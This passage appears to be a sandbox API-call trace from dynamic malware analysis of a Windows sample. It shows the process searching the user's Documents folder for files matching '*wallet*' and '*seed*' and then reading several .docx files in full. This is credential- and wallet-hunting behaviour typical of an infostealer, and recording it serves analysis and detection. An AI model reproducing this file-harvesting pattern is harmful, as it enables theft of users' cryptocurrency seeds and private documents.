lpOldMode=0x43e830) returned 1 [0280.068] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43ea90) returned 1 [0280.068] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43eac0) returned 1 [0280.068] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents", nBufferLength=0x105, lpBuffer=0x43e5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents", lpFilePart=0x0) returned 0x1c [0280.068] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\*wallet*", lpFindFileData=0x43e870 | out: lpFindFileData=0x43e870*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.069] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e830) returned 1 [0280.069] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43ea90) returned 1 [0280.069] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43eac0) returned 1 [0280.069] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents", nBufferLength=0x105, lpBuffer=0x43e5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents", lpFilePart=0x0) returned 0x1c [0280.069] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\*seed*", lpFindFileData=0x43e870 | out: lpFindFileData=0x43e870*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.069] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e830) returned 1 [0280.069] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43ea90) returned 1 [0280.069] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\7VZCVQe.docx", nBufferLength=0x105, lpBuffer=0x43e63c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\7VZCVQe.docx", lpFilePart=0x0) returned 0x29 [0280.069] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e8c8) returned 1 [0280.069] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\7VZCVQe.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\7vzcvqe.docx"), fInfoLevelId=0x0, lpFileInformation=0x283cc0c | out: lpFileInformation=0x283cc0c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98248080, ftCreationTime.dwHighDateTime=0x1d7c15c, ftLastAccessTime.dwLowDateTime=0x521f6df0, ftLastAccessTime.dwHighDateTime=0x1d7d00e, ftLastWriteTime.dwLowDateTime=0x521f6df0, ftLastWriteTime.dwHighDateTime=0x1d7d00e, nFileSizeHigh=0x0, nFileSizeLow=0x14411)) returned 1 [0280.070] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e8c4) returned 1 [0280.070] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents", nBufferLength=0x105, lpBuffer=0x43e630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents", lpFilePart=0x0) returned 0x1c [0280.070] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\7VZCVQe.docx", nBufferLength=0x105, lpBuffer=0x43e628, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\7VZCVQe.docx", lpFilePart=0x0) returned 0x29 [0280.070] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\7VZCVQe.docx", nBufferLength=0x105, lpBuffer=0x43e5fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\7VZCVQe.docx", lpFilePart=0x0) returned 0x29 [0280.070] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e83c) returned 1 [0280.070] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\7VZCVQe.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\7vzcvqe.docx"), fInfoLevelId=0x0, lpFileInformation=0x43eb00 | out: lpFileInformation=0x43eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98248080, ftCreationTime.dwHighDateTime=0x1d7c15c, ftLastAccessTime.dwLowDateTime=0x521f6df0, ftLastAccessTime.dwHighDateTime=0x1d7d00e, ftLastWriteTime.dwLowDateTime=0x521f6df0, ftLastWriteTime.dwHighDateTime=0x1d7d00e, nFileSizeHigh=0x0, nFileSizeLow=0x14411)) returned 1 [0280.070] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e838) returned 1 [0280.070] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\7VZCVQe.docx", nBufferLength=0x105, lpBuffer=0x43e540, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\7VZCVQe.docx", lpFilePart=0x0) returned 0x29 [0280.070] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea58) returned 1 [0280.070] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\7VZCVQe.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\7vzcvqe.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0280.070] GetFileType (hFile=0x480) returned 0x1 [0280.070] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43ea54) returned 1 [0280.070] GetFileType (hFile=0x480) returned 0x1 [0280.071] ReadFile (in: hFile=0x480, lpBuffer=0x283de8c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x283de8c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.072] ReadFile (in: hFile=0x480, lpBuffer=0x283de8c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x283de8c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.073] ReadFile (in: hFile=0x480, lpBuffer=0x283de8c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x283de8c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.073] ReadFile (in: hFile=0x480, lpBuffer=0x283de8c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x283de8c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.074] ReadFile (in: hFile=0x480, lpBuffer=0x283de8c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x283de8c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.074] ReadFile (in: hFile=0x480, lpBuffer=0x283de8c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x283de8c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.075] ReadFile (in: hFile=0x480, lpBuffer=0x283de8c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x283de8c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.075] ReadFile (in: hFile=0x480, lpBuffer=0x283de8c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x283de8c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.076] ReadFile (in: hFile=0x480, lpBuffer=0x283de8c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x283de8c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.076] ReadFile (in: hFile=0x480, lpBuffer=0x283de8c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x283de8c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.076] ReadFile (in: hFile=0x480, lpBuffer=0x283de8c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x283de8c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.077] ReadFile (in: hFile=0x480, lpBuffer=0x283de8c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x283de8c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.077] ReadFile (in: hFile=0x480, lpBuffer=0x283de8c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x283de8c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.077] ReadFile (in: hFile=0x480, lpBuffer=0x283de8c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x283de8c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.078] ReadFile (in: hFile=0x480, lpBuffer=0x283de8c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x283de8c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.078] ReadFile (in: hFile=0x480, lpBuffer=0x283de8c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x283de8c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.079] ReadFile (in: hFile=0x480, lpBuffer=0x283de8c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x283de8c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.079] ReadFile (in: hFile=0x480, lpBuffer=0x283de8c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x283de8c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.080] ReadFile (in: hFile=0x480, lpBuffer=0x283de8c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x283de8c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.080] ReadFile (in: hFile=0x480, lpBuffer=0x283de8c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x283de8c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.081] ReadFile (in: hFile=0x480, lpBuffer=0x283de8c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x283de8c*, lpNumberOfBytesRead=0x43eac4*=0x411, lpOverlapped=0x0) returned 1 [0280.081] ReadFile (in: hFile=0x480, lpBuffer=0x283d231, nNumberOfBytesToRead=0x3ef, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x283d231*, lpNumberOfBytesRead=0x43eac4*=0x0, lpOverlapped=0x0) returned 1 [0280.081] ReadFile (in: hFile=0x480, lpBuffer=0x283de8c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x283de8c*, lpNumberOfBytesRead=0x43eac4*=0x0, lpOverlapped=0x0) returned 1 [0280.086] CloseHandle (hObject=0x480) returned 1 [0280.087] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\IvDexdy_r Oq.docx", nBufferLength=0x105, lpBuffer=0x43e63c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\IvDexdy_r Oq.docx", lpFilePart=0x0) returned 0x2e [0280.087] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e8c8) returned 1 [0280.087] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\IvDexdy_r Oq.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\ivdexdy_r oq.docx"), fInfoLevelId=0x0, lpFileInformation=0x287e674 | out: lpFileInformation=0x287e674*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5adbb80, ftCreationTime.dwHighDateTime=0x1d77dc0, ftLastAccessTime.dwLowDateTime=0x8ad8cd60, ftLastAccessTime.dwHighDateTime=0x1d7d5b5, ftLastWriteTime.dwLowDateTime=0x8ad8cd60, ftLastWriteTime.dwHighDateTime=0x1d7d5b5, nFileSizeHigh=0x0, nFileSizeLow=0x13a69)) returned 1 [0280.087] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e8c4) returned 1 [0280.087] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents", nBufferLength=0x105, lpBuffer=0x43e630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents", lpFilePart=0x0) returned 0x1c [0280.087] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\IvDexdy_r Oq.docx", nBufferLength=0x105, lpBuffer=0x43e628, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\IvDexdy_r Oq.docx", lpFilePart=0x0) returned 0x2e [0280.087] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\IvDexdy_r Oq.docx", nBufferLength=0x105, lpBuffer=0x43e5fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\IvDexdy_r Oq.docx", lpFilePart=0x0) returned 0x2e [0280.087] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e83c) returned 1 [0280.087] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\IvDexdy_r Oq.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\ivdexdy_r oq.docx"), fInfoLevelId=0x0, lpFileInformation=0x43eb00 | out: lpFileInformation=0x43eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5adbb80, ftCreationTime.dwHighDateTime=0x1d77dc0, ftLastAccessTime.dwLowDateTime=0x8ad8cd60, ftLastAccessTime.dwHighDateTime=0x1d7d5b5, ftLastWriteTime.dwLowDateTime=0x8ad8cd60, ftLastWriteTime.dwHighDateTime=0x1d7d5b5, nFileSizeHigh=0x0, nFileSizeLow=0x13a69)) returned 1 [0280.087] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e838) returned 1 [0280.088] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\IvDexdy_r Oq.docx", nBufferLength=0x105, lpBuffer=0x43e540, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\IvDexdy_r Oq.docx", lpFilePart=0x0) returned 0x2e [0280.088] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea58) returned 1 [0280.088] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\IvDexdy_r Oq.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\ivdexdy_r oq.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0280.088] GetFileType (hFile=0x480) returned 0x1 [0280.088] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43ea54) returned 1 [0280.088] GetFileType (hFile=0x480) returned 0x1 [0280.088] ReadFile (in: hFile=0x480, lpBuffer=0x287f948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x287f948*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.090] ReadFile (in: hFile=0x480, lpBuffer=0x287f948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x287f948*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.091] ReadFile (in: hFile=0x480, lpBuffer=0x287f948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x287f948*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.091] ReadFile (in: hFile=0x480, lpBuffer=0x287f948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x287f948*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.092] ReadFile (in: hFile=0x480, lpBuffer=0x287f948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x287f948*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.092] ReadFile (in: hFile=0x480, lpBuffer=0x287f948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x287f948*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.092] ReadFile (in: hFile=0x480, lpBuffer=0x287f948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x287f948*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.093] ReadFile (in: hFile=0x480, lpBuffer=0x287f948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x287f948*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.094] ReadFile (in: hFile=0x480, lpBuffer=0x287f948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x287f948*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.108] ReadFile (in: hFile=0x480, lpBuffer=0x287f948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x287f948*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.108] ReadFile (in: hFile=0x480, lpBuffer=0x287f948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x287f948*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.109] ReadFile (in: hFile=0x480, lpBuffer=0x287f948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x287f948*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.110] ReadFile (in: hFile=0x480, lpBuffer=0x287f948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x287f948*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.110] ReadFile (in: hFile=0x480, lpBuffer=0x287f948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x287f948*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.110] ReadFile (in: hFile=0x480, lpBuffer=0x287f948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x287f948*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.111] ReadFile (in: hFile=0x480, lpBuffer=0x287f948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x287f948*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.112] ReadFile (in: hFile=0x480, lpBuffer=0x287f948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x287f948*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.113] ReadFile (in: hFile=0x480, lpBuffer=0x287f948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x287f948*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.114] ReadFile (in: hFile=0x480, lpBuffer=0x287f948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x287f948*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.114] ReadFile (in: hFile=0x480, lpBuffer=0x287f948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x287f948*, lpNumberOfBytesRead=0x43eac4*=0xa69, lpOverlapped=0x0) returned 1 [0280.114] ReadFile (in: hFile=0x480, lpBuffer=0x287ef45, nNumberOfBytesToRead=0x197, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x287ef45*, lpNumberOfBytesRead=0x43eac4*=0x0, lpOverlapped=0x0) returned 1 [0280.115] ReadFile (in: hFile=0x480, lpBuffer=0x287f948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x287f948*, lpNumberOfBytesRead=0x43eac4*=0x0, lpOverlapped=0x0) returned 1 [0280.121] CloseHandle (hObject=0x480) returned 1 [0280.121] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\KangmawL.docx", nBufferLength=0x105, lpBuffer=0x43e63c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\KangmawL.docx", lpFilePart=0x0) returned 0x2a [0280.121] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e8c8) returned 1 [0280.121] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\KangmawL.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\kangmawl.docx"), fInfoLevelId=0x0, lpFileInformation=0x28bf794 | out: lpFileInformation=0x28bf794*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3538e2e0, ftCreationTime.dwHighDateTime=0x1d769fa, ftLastAccessTime.dwLowDateTime=0x6803aeb0, ftLastAccessTime.dwHighDateTime=0x1d7b218, ftLastWriteTime.dwLowDateTime=0x6803aeb0, ftLastWriteTime.dwHighDateTime=0x1d7b218, nFileSizeHigh=0x0, nFileSizeLow=0xc17)) returned 1 [0280.121] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e8c4) returned 1 [0280.121] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents", nBufferLength=0x105, lpBuffer=0x43e630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents", lpFilePart=0x0) returned 0x1c [0280.121] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\KangmawL.docx", nBufferLength=0x105, lpBuffer=0x43e628, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\KangmawL.docx", lpFilePart=0x0) returned 0x2a [0280.121] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\KangmawL.docx", nBufferLength=0x105, lpBuffer=0x43e5fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\KangmawL.docx", lpFilePart=0x0) returned 0x2a [0280.121] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e83c) returned 1 [0280.121] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\KangmawL.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\kangmawl.docx"), fInfoLevelId=0x0, lpFileInformation=0x43eb00 | out: lpFileInformation=0x43eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3538e2e0, ftCreationTime.dwHighDateTime=0x1d769fa, ftLastAccessTime.dwLowDateTime=0x6803aeb0, ftLastAccessTime.dwHighDateTime=0x1d7b218, ftLastWriteTime.dwLowDateTime=0x6803aeb0, ftLastWriteTime.dwHighDateTime=0x1d7b218, nFileSizeHigh=0x0, nFileSizeLow=0xc17)) returned 1 [0280.121] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e838) returned 1 [0280.122] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\KangmawL.docx", nBufferLength=0x105, lpBuffer=0x43e540, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\KangmawL.docx", lpFilePart=0x0) returned 0x2a [0280.122] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea58) returned 1 [0280.122] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\KangmawL.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\kangmawl.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0280.122] GetFileType (hFile=0x480) returned 0x1 [0280.122] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43ea54) returned 1 [0280.122] GetFileType (hFile=0x480) returned 0x1 [0280.122] ReadFile (in: hFile=0x480, lpBuffer=0x28c0a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x28c0a28*, lpNumberOfBytesRead=0x43eac4*=0xc17, lpOverlapped=0x0) returned 1 [0280.125] ReadFile (in: hFile=0x480, lpBuffer=0x28bfdd3, nNumberOfBytesToRead=0x3e9, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x28bfdd3*, lpNumberOfBytesRead=0x43eac4*=0x0, lpOverlapped=0x0) returned 1 [0280.125] ReadFile (in: hFile=0x480, lpBuffer=0x28c0a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x28c0a28*, lpNumberOfBytesRead=0x43eac4*=0x0, lpOverlapped=0x0) returned 1 [0280.125] CloseHandle (hObject=0x480) returned 1 [0280.126] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\t6GW4d_MTgVoESu.docx", nBufferLength=0x105, lpBuffer=0x43e63c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\t6GW4d_MTgVoESu.docx", lpFilePart=0x0) returned 0x31 [0280.126] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e8c8) returned 1 [0280.126] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\t6GW4d_MTgVoESu.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\t6gw4d_mtgvoesu.docx"), fInfoLevelId=0x0, lpFileInformation=0x28c5f40 | out: lpFileInformation=0x28c5f40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x770dc980, ftCreationTime.dwHighDateTime=0x1d7689f, ftLastAccessTime.dwLowDateTime=0x3786f610, ftLastAccessTime.dwHighDateTime=0x1d779a7, ftLastWriteTime.dwLowDateTime=0x3786f610, ftLastWriteTime.dwHighDateTime=0x1d779a7, nFileSizeHigh=0x0, nFileSizeLow=0x12cd8)) returned 1 [0280.126] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e8c4) returned 1 [0280.126] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents", nBufferLength=0x105, lpBuffer=0x43e630, lpFilePart=0x0 | 